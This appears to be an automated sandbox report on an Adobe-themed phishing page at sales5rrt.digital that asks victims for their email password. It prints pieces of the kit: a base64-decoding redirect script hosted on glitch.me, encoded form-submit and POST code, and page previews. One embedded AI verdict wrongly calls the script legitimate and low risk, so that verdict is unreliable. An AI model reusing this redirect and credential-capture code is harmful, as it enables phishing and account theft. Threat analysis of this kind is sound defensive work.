CAgICAgZG9jdW1lbnQuZm9ybXNbMF0uc3VibWl0KCk7CiAgfSBlbHNlIHsKICAgICAgICAgICAgICAgICAgIGlmICghd2luZG93LmxvY2F0aW9uLmhhc2gpIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdpbmRvdy5sb2NhdGlvbi5ocmVmID0gd2luZG93LmxvY2F0aW9uLmhyZWY7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdpbmRvdy5sb2NhdGlvbi5yZWxvYWQoKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KICB9Cn0gZWxzZSB7CiAgICAgICAgICAgICAgICAgaWYgKCF3aW5kb3cubG9jYXRpb24uaGFzaCkgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2luZG93LmxvY2F0aW9uLmhyZWYgPSB3aW5kb3cubG9jYXRpb24uaHJlZjsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0gZWxzZSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2luZG93LmxvY2F0aW9uLnJlbG9hZCgpOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQp9CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgICAgICAgICB9OwogICAgICAgICAgICAgICAgICAgICAgICB4aHR0cC5vcGVuKCJQT1NUIiwgIi9hcmNoaXByb2R1Y3QvZ3J1bmVudGhhbC5odG1sIiwgdHJ1ZSk7CiAgICAgICAgICAgICAgICAgICAgICAgIHhodHRwLnNldFJlcXVlc3RIZWFkZXIoJ3lNc0YwWFExVjR2NU5UQlpMSDJ3TzJtWlZCYyc
URL: https://sales5rrt.digital/archiproduct/grunenthal.... Model: Joe Sandbox AI	{ "risk_score": 3, "reasoning": "The provided JavaScript snippet appears to be a legitimate implementation for pre-populating an email input field with a value from the URL hash. This is a common practice for improving user experience, such as in password reset or email verification flows. While the code uses some basic DOM manipulation, it does not exhibit any high-risk behaviors like dynamic code execution, data exfiltration, or obfuscation. The overall risk is low, as the script is likely serving a legitimate purpose." }
document.addEventListener("DOMContentLoaded", function() { // Get the email from the URL hash var email = window.location.hash.substr(1); // Remove the '#' character // Set the email value to the input field document.getElementById("email").value = email; // Replace placeholder with the actual email document.getElementById("email").value = document.getElementById("email").value.replace("[[Email]]", email); });
URL: https://sales5rrt.digital/archiproduct/grunenthal.html#customerservice@diatron.com Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "File protection is enabled. Confirm recipient email and password to continue.", "prominent_button_name": "View Document", "text_input_field_labels": [ "customerservice@diatron.com", "Password" ], "pdf_icon_visible": true, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://sales5rrt.digital Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": true, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": true, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": false, "reasoning": "The URL contains suspicious elements including: a non-standard TLD (.digital), random characters in the domain name (5rrt), and the use of 'sales' which is often associated with phishing attempts. The .digital TLD is less common and often used in malicious campaigns." }
URL: https://sales5rrt.digital
URL: https://sales5rrt.digital/archiproduct/grunenthal.html#customerservice@diatron.com Model: Joe Sandbox AI	{ "brands": [ "Adobe" ] }
	{ "brands": [ "Adobe" ] }
URL: https://sales5rrt.digital/archiproduct/grunenthal.html#customerservice@diatron.com Model: Joe Sandbox AI	```json{ "legit_domain": "adobe.com", "classification": "wellknown", "reasons": [ "The brand 'Adobe' is well-known and typically associated with the domain 'adobe.com'.", "The URL 'sales5rrt.digital' does not match the legitimate domain 'adobe.com'.", "The domain 'digital' is unusual for Adobe and could indicate a phishing attempt.", "The presence of an email input field with a non-Adobe domain 'diatron.com' is suspicious.", "The URL contains no direct reference to Adobe, which is a red flag for phishing." ], "riskscore": 9} Google indexed: False
URL: sales5rrt.digital Brands: Adobe Input Fields: customerservice@diatron.com, Password

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 16 06:01:29 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9899945923081823
Encrypted:	false
SSDEEP:
MD5:	BCF5516CD510B868ACD25D4EBF4B767A
SHA1:	25185E8BC4C2861DE902C4ACDA462C076F4C9E11
SHA-256:	248EA8AF87DFE62A6BCBA07B232233E146973D3CC0CCE154A7568149DEBFE8F5
SHA-512:	2CA22537E311C025ED7D37B51C91E7590546F5A4E22A97E4BB1C14A2DAFA6DF5BCC6AEC7B3E5AC450BA35776EA1F638FBA15CA9252EAB3B8266D67D6EE4BC50A
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....}.w.g......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I0Z'8....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V0Z.8....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V0Z.8....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V0Z.8...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V0Z/8...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............A.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 16 06:01:29 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	4.003152598826875
Encrypted:	false
SSDEEP:
MD5:	9BD2EBD9AB1F90D0CD705F109D0CEA20
SHA1:	3EC702975A2C45CDFD2127D6FCD78A8D76EC23E3
SHA-256:	BF499BC8C20CE4F3D4516BA1C3EEBC18C6334881A7F6C17B2F875208A0067372
SHA-512:	5D14B3EED6247687E81A5B6CAC06DAB9C9DB0DFFE39D58CB12BC3D7D68EB0E9816E31CFAEE5B10BB2A84CF38A928089A5C99F0E4906E4F7F0748C8E921148A29
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....>t.w.g......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I0Z'8....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V0Z.8....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V0Z.8....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V0Z.8...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V0Z/8...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............A.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.014644981777852
Encrypted:	false
SSDEEP:
MD5:	FF3C164F99375582755E78C253D842BF
SHA1:	45E59E336E105831EC6841AF8B76643123767255
SHA-256:	E7D692685629A11F6A162937A1B3241A1320D59D79C0FD58A6260D25C4AB6220
SHA-512:	16651F3456D225969B51543CD06B9C1E9E46051DB76AE438731E7CCFF430C7139B8F79B101EF74A667FD73648EDB578F9686381749E430A217E942D6A8A96BB2
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I0Z'8....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V0Z.8....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V0Z.8....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V0Z.8...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............A.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 16 06:01:29 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	4.002197882980609
Encrypted:	false
SSDEEP:
MD5:	33C54408EC53D3A8F9B1581ECF1F2809
SHA1:	B74DB59D78F97DBA3B3317D5E00B0909E808D423
SHA-256:	9E8126509FAEC53916E6D7E1D879C007283447214DA2DD9ACA42C24239AA5E86
SHA-512:	F827CF20FDB4E6ED385FA64426FF2333BF284D8644F1B190C6D80FB92C62C126C63D739DE325BB126E182E63328584F5C6213EE124841A580581101CFC7B3253
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....4..w.g......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I0Z'8....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V0Z.8....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V0Z.8....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V0Z.8...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V0Z/8...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............A.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 16 06:01:29 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.993229781731249
Encrypted:	false
SSDEEP:
MD5:	3EA3DE76161A48395CB13AFC8D01D02E
SHA1:	549A3C086288AF27641B779E9C7E4FC39275C5E1
SHA-256:	30493E72637BA5B7D3999FEA858164CE5755FFE80680C0F41D84F44B08BECADA
SHA-512:	0A4315CB53C6370194F9FB261064DE65CFC5EFDE83257DAC13FA77F6B56987997AE280E3B60D1194818CEFD0514CAC566FFADDA2AE5E3926A1D82BF9B8BA802F
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....!..w.g......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I0Z'8....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V0Z.8....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V0Z.8....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V0Z.8...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V0Z/8...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............A.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 16 06:01:29 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	4.0030225337894105
Encrypted:	false
SSDEEP:
MD5:	61F32DDFFB680FA3352F69031524021A
SHA1:	7304542668DB7D8C4BF19B80B111366D41168E95
SHA-256:	09682F9424E049331329711EC11D992ED6FCC4BA855C040F9D04AB6C073E9F72
SHA-512:	19BA12618C448980A1C6B449468488A06DF102810E7E6624B11A5BB23C6D116D033AFDA93FE310FA394ADF96B58683800B4D0F511FE54A01E80D22A4A288C075
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....o..w.g......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I0Z'8....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V0Z.8....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V0Z.8....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V0Z.8...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V0Z/8...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............A.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 54

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	798
Entropy (8bit):	5.006692612194791
Encrypted:	false
SSDEEP:
MD5:	4EA0E2E3C4ABB0DDDD3B70ECB786789E
SHA1:	17BF9D61D6C06AC2E32E48B790C53E3B05BF3090
SHA-256:	9261D7A56591FD643C8F99F9BA970DD8228EC6E16B6CE9B489318D701695D99E
SHA-512:	D2E109D38F4660A0E297E8414DC512D72A3E35D33637569B6A27DC0B7DD44D2F1428D0E69DED565EE02B79E7EDA34979A74E222249E93990A96CE68DBE13B66A
Malicious:	false
Reputation:	unknown
URL:	https://denionquil.glitch.me/
Preview:	<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <title>CONTRACT</title>.</head>.<body>.<script>. function base64Decode(str) {. try {. return decodeURIComponent(atob(str).split('').map(function(c) {. return '%' + ('00' + c.charCodeAt(0).toString(16)).slice(-2);. }).join(''));. } catch (e) {. console.error('Invalid base64 string:', str);. return null;. }. }.. var hash = window.location.hash;. if (hash !== "") {. hash = hash.substring(1); // Remove the '#' character. const email = base64Decode(hash);.. if (email) {. window.location.href = "https://sales5rrt.digital/archiproduct/grunenthal.html#" + (email);. }. }.</script>.</body>.</html>

Chrome Cache Entry: 55

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	315
Entropy (8bit):	5.0572271090563765
Encrypted:	false
SSDEEP:
MD5:	A34AC19F4AFAE63ADC5D2F7BC970C07F
SHA1:	A82190FC530C265AA40A045C21770D967F4767B8
SHA-256:	D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
SHA-512:	42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
Malicious:	false
Reputation:	unknown
URL:	https://sales5rrt.digital/archiproduct/css/styles.css
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.

Chrome Cache Entry: 56

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	28
Entropy (8bit):	4.307354922057604
Encrypted:	false
SSDEEP:
MD5:	38877D38FB5DCDEFE823D08DF5B138D8
SHA1:	6B83BF1B4F595F9FCC0F0C9CD48B8A4150DFFDEC
SHA-256:	13CD0FA30D1AE06D7CFA7637FCE027EA93508032355034BBDEE631B31AF0F4DF
SHA-512:	C58843361F11CDD4335D6269F6E32F9795ABD9E98686CC2FB4A93419A97632990D1C5D89E11B21AFE89BB938B3D1B135AA8F10F76DEC112A2C9D6801CC35D260
Malicious:	false
Reputation:	unknown
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSFwnl1qrW2gZGvhIFDYOoWz0SBQ1Xevf9?alt=proto
Preview:	ChIKBw2DqFs9GgAKBw1Xevf9GgA=

Chrome Cache Entry: 57

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (56129), with CRLF line terminators
Category:	downloaded
Size (bytes):	473581
Entropy (8bit):	6.0370232186498
Encrypted:	false
SSDEEP:
MD5:	5EB3BB3AAB7AA70C7D225459283302FE
SHA1:	079E07BDDF40F897BD7774D204A76E34CF3E2C00
SHA-256:	237FA9F72A912F1FFD338C949A5203BD7063C75100226F0016D0FF689E46F776
SHA-512:	36D1643FA65C1A099162E6379D463A7FBDCB0D404D549D1F70D8872D81DCE1C1122676E9E2D822CB9489A418EFE396BF4F5FC6F69E351CCD144321884514E7BB
Malicious:	false
Reputation:	unknown
URL:	https://sales5rrt.digital/archiproduct/grunenthal.html
Preview:	....<!DOCTYPE html>..<html>..<head>...<title>Online PDF Viewer</title>...<link rel="icon" type="image/png" href=" data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAkGBxAPEBAQDxAQDxAQEBAPDg8OEBYQDw8QFRIWFhUVFRYYHSggGBolHRUVITEhJSkrLi4uFyA0OTQtOCguLisBCgoKDg0OGhAQGy0lHyUtKy0tLS0tLS0tLS0tKy0tLS0tLS0tLS0tKy0tLS0tLS0tLS0tLS0tLS0rLS0rLS0tLf/AABEIAQEAxAMBIgACEQEDEQH/xAAcAAABBQEBAQAAAAAAAAAAAAAAAQIDBAUHBgj/xABOEAABAgMEBAkIBQgIBwAAAAABAAIDBBEFBhIhMVGRsQcTFDJBYXFygRUiM1JUobLSI0KSk8E0Q1NidILC8BYkNXOis9HhF0Rjg5Ti8f/EABsBAQACAwEBAAAAAAAAAAAAAAABAwIEBQYH/8QANBEAAgECBAMFBwMFAQAAAAAAAAECAxEEEiExE0FRBYGRobEUIjJhccHRFeHwQlJicqIj/9oADAMBAAIRAxEAPwDuKbE0HsKMY1jamvcKHMaD0oConwOcP56EmA6jsToQIIJBA1nIIC2oZjR4qTGNY2qOMajLPPozQFZTyvT4KLAdR2KWXyrXLtyQFhVpnSOxT4xrG1QR8yKZ9maAhVqX5viVXwHUdingmgocu3JATKnF5x7VaxjWNqrRASTQE9gQEaus0DsCp4DqOxW2vFBmNqAcVRV0vGsbVUwHUdiAIekdoV1U2NIIqDp1K1jGsbUA2PzT4b1UVmK4EEDM6hmoMB1HYgHy2nwVpVoAoc8sunJT4xrG1AOQm4xrG1CA8vCtmK7mwcVNNKmieLUjjPk5y6nJ91+ZE743LZKAyPLcx7P8SR9tRyKcn+L/AEW

Chrome Cache Entry: 58

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (8708), with no line terminators
Category:	downloaded
Size (bytes):	8708
Entropy (8bit):	5.72669593288831
Encrypted:	false
SSDEEP:
MD5:	63176A6E03316170D77B27BDC7ADA7C6
SHA1:	9A54C21786F453C6F74186DDAD62315A563892D8
SHA-256:	69CEC4E73D8A7B5CBCDC46A2290410E5505DB7DDD2A605EA6F6A2D39DF6A02C2
SHA-512:	751BD1221B3FB68CA9350C6512793C658A35092F14D6C782B825B0843A94A08551B353AFBBDBE27F510B3B92E5D68C749569B174F4378E3128D8364FD6DA5EAC
Malicious:	false
Reputation:	unknown
URL:	https://sales5rrt.digital/cdn-cgi/challenge-platform/h/b/scripts/jsd/e0c90b6a3ed1/main.js?
Preview:	window._cf_chl_opt={cFPWv:'b'};~function(W,h,i,n,o,y,z,B){W=b,function(c,d,V,e,f){for(V=b,e=c();!![];)try{if(f=parseInt(V(358))/1+parseInt(V(370))/2+-parseInt(V(378))/3(parseInt(V(359))/4)+-parseInt(V(420))/5+parseInt(V(388))/6(parseInt(V(332))/7)+parseInt(V(349))/8+parseInt(V(300))/9,f===d)break;else e.push(e.shift())}catch(E){e.push(e.shift())}}(a,150870),h=this\|\|self,i=h[W(343)],n={},n[W(372)]='o',n[W(394)]='s',n[W(391)]='u',n[W(399)]='z',n[W(320)]='n',n[W(412)]='I',n[W(305)]='b',o=n,h[W(365)]=function(E,F,G,H,a8,J,K,L,M,N,O){if(a8=W,F===null\|\|void 0===F)return H;for(J=x(F),E[a8(360)][a8(333)]&&(J=J[a8(347)](E[a8(360)][a8(333)](F))),J=E[a8(328)][a8(401)]&&E[a8(422)]?E[a8(328)][a8(401)](new E[(a8(422))](J)):function(P,a9,Q){for(a9=a8,P[a9(348)](),Q=0;Q<P[a9(417)];P[Q]===P[Q+1]?P[a9(326)](Q+1,1):Q+=1);return P}(J),K='nAsAaAb'.split('A'),K=K[a8(357)][a8(314)](K),L=0;L<J[a8(417)];M=J[L],N=v(E,F,M),K(N)?(O='s'===N&&!E[a8(396)](F[M]),a8(327)===G+M?I(G+M,N):O\|\|I(G+M,F[M])):I(G+M,N),L++);

Chrome Cache Entry: 59

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (8779), with no line terminators
Category:	dropped
Size (bytes):	8779
Entropy (8bit):	5.749458646862783
Encrypted:	false
SSDEEP:
MD5:	22DA3416E6AAEC02585DB7FE1E40CC30
SHA1:	DBE30E414C254E99D1B2A37F3A5349F0A751387F
SHA-256:	28D258379A80E8D18BB556E39D9FEED0C2F800A119B5367C1D79544012BED736
SHA-512:	23C90C7006796F328ADBA77474F1C29338B3684D9D0475B2AED3E2BB17757AF331CC1D95E9E932E2D0D89C9B474BF64140ABA534FB5643F498AEF23B4BD8E90E
Malicious:	false
Reputation:	unknown
Preview:	window._cf_chl_opt={cFPWv:'b'};~function(W,h,i,j,k,o,s,x){W=b,function(d,e,V,f,g){for(V=b,f=d();!![];)try{if(g=-parseInt(V(487))/1(-parseInt(V(475))/2)+-parseInt(V(447))/3(-parseInt(V(530))/4)+parseInt(V(528))/5+parseInt(V(466))/6+parseInt(V(465))/7(-parseInt(V(418))/8)+-parseInt(V(467))/9(parseInt(V(488))/10)+-parseInt(V(486))/11,g===e)break;else f.push(f.shift())}catch(E){f.push(f.shift())}}(a,498058),h=this\|\|self,i=h[W(485)],j={},j[W(421)]='o',j[W(495)]='s',j[W(534)]='u',j[W(521)]='z',j[W(498)]='n',j[W(422)]='I',j[W(537)]='b',k=j,h[W(461)]=function(g,E,F,G,a1,I,J,K,L,M,N){if(a1=W,E===null\|\|E===void 0)return G;for(I=n(E),g[a1(439)][a1(473)]&&(I=I[a1(517)](g[a1(439)][a1(473)](E))),I=g[a1(502)][a1(516)]&&g[a1(423)]?g[a1(502)][a1(516)](new g[(a1(423))](I)):function(O,a2,P){for(a2=a1,O[a2(527)](),P=0;P<O[a2(479)];O[P]===O[P+1]?O[a2(459)](P+1,1):P+=1);return O}(I),J='nAsAaAb'.split('A'),J=J[a1(429)][a1(460)](J),K=0;K<I[a1(479)];L=I[K],M=m(g,E,L),J(M)?(N=M==='s'&&!g[a1(444)](E[L]),a1(4

Static File Info

⊘No static file info